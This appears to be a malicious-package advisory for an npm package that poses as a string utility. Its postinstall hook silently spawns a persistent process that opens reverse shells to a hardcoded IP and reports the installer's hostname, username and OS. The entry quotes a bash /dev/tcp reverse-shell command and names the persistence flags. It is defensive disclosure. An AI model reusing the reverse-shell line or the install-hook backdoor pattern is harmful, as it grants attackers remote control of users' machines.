MAL-2026-6235

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a59a0aee58573b3030b9d541980fa9d7df8ea55d4e6cc5b3bb349452b908d0e9) On `npm install`, the postinstall hook (`scripts/postinstall.js`) detach-spawns `scripts/shell.js` with `detached: true, stdio: 'ignore', windowsHide: true` and `unref()`s it, so the malicious process persists silently after `npm install` returns. `scripts/shell.js` hardcodes `HOST = '114.67.90.67'` and opens reverse shells to that IP across multiple fallback ports (3334, 4444, 443, 80, 8080, 53) using Node `net`, `bash -c "bash -i >& /dev/tcp/<HOST>/<port> 0>&1"`, and a Python fallback, then uses `setInterval` to keep the process alive. It also sends an HTTP GET to `http://114.67.90.67:8333/ping` with the installer's hostname, username, cwd, and OS platform/release as query parameters, confirming victim acquisition. The package advertises itself as a string-manipulation utility, providing cover for the backdoor. Installing this package gives the operator of 114.67.90.67 interactive shell access on the installer's machine.